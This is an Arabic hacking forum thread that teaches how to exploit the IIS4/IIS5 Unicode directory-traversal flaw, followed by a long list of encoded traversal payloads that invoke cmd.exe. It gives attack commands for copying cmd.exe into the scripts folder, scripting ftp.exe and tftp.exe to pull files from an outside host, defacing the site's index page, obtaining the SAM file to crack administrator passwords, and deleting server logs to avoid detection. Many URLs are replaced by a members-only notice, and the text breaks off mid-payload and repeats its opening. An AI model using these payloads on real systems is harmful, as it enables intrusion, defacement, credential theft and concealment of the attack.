Milad
08/02/2005, 17:11
UNICODE - Internet Information Service IIS4 - IIS5
اليونيكود – نظام خدمة المعلومات للانترنت الاصدار الرابع – الخامس
يحتوى هذا الدرس على ( 13 نقطة ) وهي كما يلي :
1- تعريف باليونيكود .
2- تاريخ ظهور هذه الثغرة .
3-كيفية ايجاد هذه الثغرات .
4- كيف يتم استغلال ثغرات اليونكود .
5- الاوامر المستخدمة بواسطة ملف CMD .
6- طريقة تطبيق هذه الثغرات .
7- كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .
8- طريقة نسخ ملف الـ CMD لاتاحة امكانية الكتابة على الملفات .
9- كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها .
10- كيفية عمل اكاونت للدخول بواسطة الـFTP .
11- طريقة كشف باسورد الادمينستريتور .
12- تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج TFTP .
13- مسح ملفات اللوق حتى لا يتم التعرف عليك .
- تعريف باليوني كود
اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع IIS4.0 / IIS5.0 والذي ياتي عادة مع NT4 / Win2k .
تاريخ ظهور هذه الثغرة .
لايوجد تاريخ محدد لظهور اول ثغرة لليونيكود لذا يعتبر ظهورها بواسطة شخص مجهول anonymous person ، وقيل ان اول ظهور لثغرات اليونيكود كانت بواسطة الصينين ولكن لايوجد مايثبت صحة هذا الكلام لهذه الثغرات ، فتم استغلال هذه الثغرات من قبل المخترقين وتطوير البرامج اللازمة لها .
كيفية ايجاد هذه الثغرات
يتم ايجاد هذه الثغرات بطريقتين :-
1- بواسطة البرامج اللازمة والمتخصصة لكشف هذه الثغرات سواء بالبرامج التي تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس .
2- بواسطة تطبيق الثغرة على الموقع مباشرة .
الاوامر المستخدمة بواسطة ملف
- امر لانشاء دليل جديد .
- امر لالغاء دليل .
- امر النسخ .
- امر النقل .
- امر الحذف .
- امر تغيير اسماء الملفات .
- امر لرؤية محتويات الملف .
- امر الكتابة داخل أي ملف .
- امر لسحب أي ملف .
وهي حسب الامثلة التالية :
امر انشاء دليل جديد:-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
امر الغاء دليل :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
ملاجظة : لايمكن الغاء أي دليل الا اذا كان فارغاً تمام من الملفات والمجلدات
الامر المستخدم للنسخ :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
الامر المستخدم للنقل :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
الامر المستخدم للحذف :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
الامر المستخدم لتغيير مسمى الملفات :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
الامر المستخدم لرؤية محتويات الملف :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
الامر المستخدم للكتابة داخل أي ملف :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
الامر المستخدم لعملية سحب أي ملف :-
عليك القيام اولاً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف في اخر العنوان كالتالي:
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
- طريقة تطبيق هذه الثغرات
تطبيق الثغرة على الموقع من خلال المتصفح تتم حسب الامثلة التالية :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -/////////////// +c
وقد نحتاج الى تغيير مسمى الدليل بحيث يكون :-
Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin
- كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .[/
في حالة اكتشاف موقع يعاني من مشكلة اليوني كود ولنفترض انه كان على هذه الثغرة :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
فنحتاج الى نسخ ملف w3svc.exe الى مجلد inetpub\scripts والامر يكون بهذه الطريقة :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
بعد نسخ ملف w3svc.exe الى مجلد inetpub\scripts ، الان نقوم بتصفح الموقع من خلال الثغرة بهذه الطريقة :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
الان نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا مايكون في هذا الدليل
inetpub\////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -/////////////// بحيث يكون الامر بالشكل التالي :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////@Hotmail.com+>+c:\inetpub\////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -/////////////// ndex.htm
طريقة نسخ ملف الـCMD لاتاحة امكانية الكتابة على الملفات
الغرض من نسخ ملف الـCMD وهو لاعطاء امكانية للكتابة داخل السيرفر في بعض الحالات ويتم نسخه الى مجلد السيكربت بهذه الطريقة :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
الان بامكاننا استخدام ملف الـCMD الجديد في الثغرة بدلا من الاول بهذا الشكل :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها
تتم معرفة مشكلة الـAccess Denied من خلال المحاولة في حذف أي ملف من أي امتداد ، فعند ظهور رسالة الـ Access Denied فاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكم اكثر على السيرفر :-
1- الطريقة الاولى نسخ ملف الـ CMD الى دليل السيكربت بمسمى CMD1 فسوف يتاح لك امكانية الكتابة باستخدام الامر Copy باستخدام هذا الامر :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
2- الطريقة الثانية بالتعامل مع الملف ssinc.dll والطريقة كما يلي :-
*اولا انشاء صفحة باسم test.shtml
*تكون هذه الصفحة داخل مجلد ////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
*كتابة هذا الكود داخل الصفحة <!--#include file="AAAA[...]AA"--> بحيث ان حرف A يتم كتابتة حتى يتعدى 2049 حرف .
*الان يتم طلب الصفحة من خلال المتصفح ////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
*الان سوف تظهر لك الصفحة .
*الان تستطيع الكتابه وتم تخطي مشكلة الـAccess Denied
اذا ظهرت لك صفحة الخطاء رقم 500 فمعناها انك لم تقم بتطبيق الطريقة بالشكل الصحيح وعليك اعادة المحاولة .
3- الطريقة الثالثة باستخدام برنامج NC.exe بحيث يتم عمل اب لوود لهذا الملف داخل مجلد الـTemp في دليل الويندوز ومنه يتم تنفيذ الاوامر من خلال موجة الدوز وللمعلومية مجلد الـTemp مفتوح لعمليات الاب لوود .
4- الطريقة الرابعة وهي من خلال عمل كراش للسيرفر باستخدام البرامج اللازمة لهذا الغرض وهذه الطريقة غير مجديه في كثير من الاحيان .
5- البحث عن ملفات : root.exe ، sensepost.exe ، shell.exe ، w3svc.exe ونسخها الى مجلد c:\inetpub\scripts وتطبيق الثغرة من خلالها .
1- نسخ ملف CMD الى مجلد Scripts باسم Shell.exe حتى يتم الاستفادة من ثغرة قديمة
/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\script s\shell.exe
2- انشاء ملف mspft.pll بواسطة الامر Echo وكتابة فيه التالي open ftp.host.com حيث ان هذا هو الخادم للـFTP .
/c+echo+open+ftp.host.com+>+c:\winnt\mspft.ppl
3- الان مطلوب اضافة مجهول Anonymous الى نفس الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+anonymous+>>+c:\winnt\mspft.ppl
4- الان مطلوب ادراج البريد ////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -/////////////// الى نفس الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////+>>+c:\winnt\mspft.ppl
5- إضافة User قبل Anonymous لزوم الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.ppl
6- الان تكرار لحاجة الاعداد
/shell.exe?/c+echo+////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////+>>+c:\winnt\mspft.ppl
7- يتم هنا ادراج الموقع الحالي للملفات
/shell.exe?/c+echo+lcd+c:\inetpub\////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -/////////////// pft.ppl
8- الان يكتب اوامر الـFTP اللازمة لسحب الملف من خادم الـFTP وهي Get index.htm ثم يدرج هنا بدون المسج السابق
/shell.exe?/c+echo+get+index.html+>>+c:\winnt\mspft.ppl
9- هنا نفس السابق ولكن باضافة Quit
/shell.exe?/c+echo+quit+>>+c:\winnt\mspft.ppl
10- الان يتم تنفيذ امر FTP.exe?+"-s:c:winnt\mspft.ppl” وهو عبارة عن خطوات قمنا بانشاءها وموجودة في ملف mspft.ppl باحتوائها على مايلي :-
- Open FTP.host.com
- Anonymous
- ////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
- User Anonymous
- ////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
- Get index.html
- Quit
/msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-s:c:\winnt\mspft.ppl"
طريقة كشف باسورد الادمينستريتور
نحتاج الى وجود برنامجين وهي ( Microsoft Access – L0phtCrack ) لزوم تنفيذ بعض الخطوات التالية وهي :-
- باسورد الادمينستيتور للسيرفر يكون موجود في ملف الـ SAM._ في دليل \winnt\repair\ وافضل برنامج لفك شفرة الباسورد هو برنامج L0phtCrack .
اذا كان هناك مستخدمين في السيرفر ويوجد لديهم حساب فان معلوماتهم سوف تكون في ملف PASSFILT.DLL ونستطيع تحديد مسار هذا الملف من خلال الريجستري بواسطة هذا المفتاح :-
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro
l\Lsa\SYSTEM32\PASSFILT.DLL
اذا كان السيرفر يعتمد في القراءة باستخدام صفحات الـ ASP للوصول الى البيانات من خلال قاعدة الـ MySQL فسوف نحتاج الى تطبيق ثغرة ( +.htr ) للوصول الى باسورد المسئول عن هذة القاعده وهي كالتالي :-
////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -///////////////
عند ظهور صفحة الخطا في الوصول الى الصفحة المطلوبة وبالتحديد في سيكربت التنفيذ فالطريقة صحيحة وماعلينا فقط سوى سحب ملف database.inc وقراءة محتوياته للعثور على اسم المستخدم والباسورد للمسئول عن قاعدة البيانات والان يتم الاتصال بها من خلال برنامج الـ Access .
تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامجTFTP /]
1- قم بانشاء صفحة وضع شعارك عليها واحفظها باسم index.htm على الـ c
2- قم بتشغيل برنامج TFTP ونفذ الامر في الفقرة التالية .
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -/////////////// m
tftp.exe :
البرنامج اللازم لعمل الاب لوود ويجب ان يكون شغال في حالة تنفيذ الامر
"-i":
بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات
1.1.1.1 :
رقم الايبي الخاص بك
GET :
الامر اللازم لطلب الملفات مابين الارسال والاستقبال
index.htm :
اسم الملف بجهازك
\inetpub\////////////// الروابط الي بيحطوها الأعضاء بيقدر فقط الأعضاء يشوفوها ، اذا مصرّ تشوف الرابط بك تسجل يعني تصير عضو بأخوية سوريا بالأول -/////////////// :
اسم الدليل في السيرفر
index.htm :
اسم الملف على السيرفر
- مسح ملفات اللوق حتى لا يتم التعرف عليك .
وتتم هذه العملية من خلال حذف ملفات الـ Log من مجلد System بواسطة الامر :-
/c+del+c:/winnt/system32/logfiles/*.log
--------------------------------------------------------------------------------
B-H18-10-2003, 13:55
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_vti_bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25% 35%63../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../%77%69%6E%6E%74/s%79s%74%65%6D%33%32/%63%6D%64%2E%65%78%65?/c+dir
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/_vti_cnf/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/_vti_cnf/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/adsamples/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/adsamples/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/adsamples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/cgi-bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/msadc/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
/msadc/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/msadc/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/%bg%ae%bg%ae/%bg%ae%bg%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%c0%9u%c0%9u/%c0%9u%c0%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%c0%qe%c0%qe/%c0%qe%c0%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%cg%9u%cg%9u/%cg%9u%cg%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%cg%ae%cg%ae/%cg%ae%cg%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%cg%qe%cg%qe/%cg%qe%cg%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%d0%9u%d0%9u/%d0%9u%d0%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%d0%ae%d0%ae/%d0%ae%d0%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%d0%qe%d0%qe/%d0%qe%d0%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%7g%9u%dg%7g%9u/%dg%7g%9u%dg%7g%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%7g%ae%dg%7g%ae/%dg%7g%ae%dg%7g%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%7g%qe%dg%7g%qe/%dg%7g%qe%dg%7g%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%80%9u%dg%80%9u/%dg%80%9u%dg%80%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%80%ae%dg%80%ae/%dg%80%ae%dg%80%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%80%qe%dg%80%qe/%dg%80%qe%dg%80%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%o0%9u%dg%o0%9u/%dg%o0%9u%dg%o0%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%o0%ae%dg%o0%ae/%dg%o0%ae%dg%o0%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%o0%qe%dg%o0%qe/%dg%o0%qe%dg%o0%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%7g%9u%e0%7g%9u/%e0%7g%9u%e0%7g%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%7g%ae%e0%7g%ae/%e0%7g%ae%e0%7g%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%7g%ae%e0%7g%qe/%e0%7g%ae%e0%7g%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%7g%qe%e0%7g%qe/%e0%7g%qe%e0%7g%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%80%9u%e0%80%9u/%e0%80%9u%e0%80%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%80%qe%e0%80%qe/%e0%80%qe%e0%80%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%o0%9u%e0%o0%9u/%e0%o0%9u%e0%o0%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%o0%ae%e0%o0%ae/%e0%o0%ae%e0%o0%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%o0%qe%e0%o0%qe/%e0%o0%qe%e0%o0%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%7g%9u%e0%7g%9u/%e0%7g%9u%e0%7g%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%7g%ae%e0%7g%ae/%e0%7g%ae%e0%7g%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%7g%qe%e0%7g%qe/%e0%7g%qe%e0%7g%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%80%9u%u0%80%9u/%u0%80%9u%u0%80%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%80%ae%u0%80%ae/%u0%80%ae%u0%80%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%80%qe%u0%80%qe/%u0%80%qe%u0%80%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%o0%9u%e0%o0%9u/%e0%o0%9u%e0%o0%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%o0%ae%e0%o0%ae/%e0%o0%ae%e0%o0%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%o0%qe%e0%o0%qe/%e0%o0%qe%e0%o0%qe/winnt/system32/cmd.exe?/c+dir
/scripts/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/scripts/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/scripts/..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/scripts/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/scripts/..%bg%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%bg%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%bg%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%cg%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%cg%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%cg%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%ch%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%ch%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%d0%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%d0%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%d1%8s../winnt/system32/cmd.exe?/c+dir
/scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%d1%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%fc%80%80%80%80%e/.%
--------------------------------------------------------------------------------
اليونيكود – نظام خدمة المعلومات للانترنت الاصدار الرابع – الخامس
يحتوى هذا الدرس على ( 13 نقطة ) وهي كما يلي :
1- تعريف باليونيكود .
2- تاريخ ظهور هذه الثغرة .
3-كيفية ايجاد هذه الثغرات .
4- كيف يتم استغلال ثغرات اليونكود .
5- الاوامر المستخدمة بواسطة ملف CMD .
6- طريقة تطبيق هذه الثغرات .
7- كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .
8- طريقة نسخ ملف الـ CMD لاتاحة امكانية الكتابة على الملفات .
9- كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها .
10- كيفية عمل اكاونت للدخول بواسطة الـFTP .
11- طريقة كشف باسورد الادمينستريتور .
12- تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج TFTP .
13- مسح ملفات اللوق حتى لا يتم التعرف عليك .
- تعريف باليوني كود
اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع IIS4.0 / IIS5.0 والذي ياتي عادة مع NT4 / Win2k .
تاريخ ظهور هذه الثغرة .
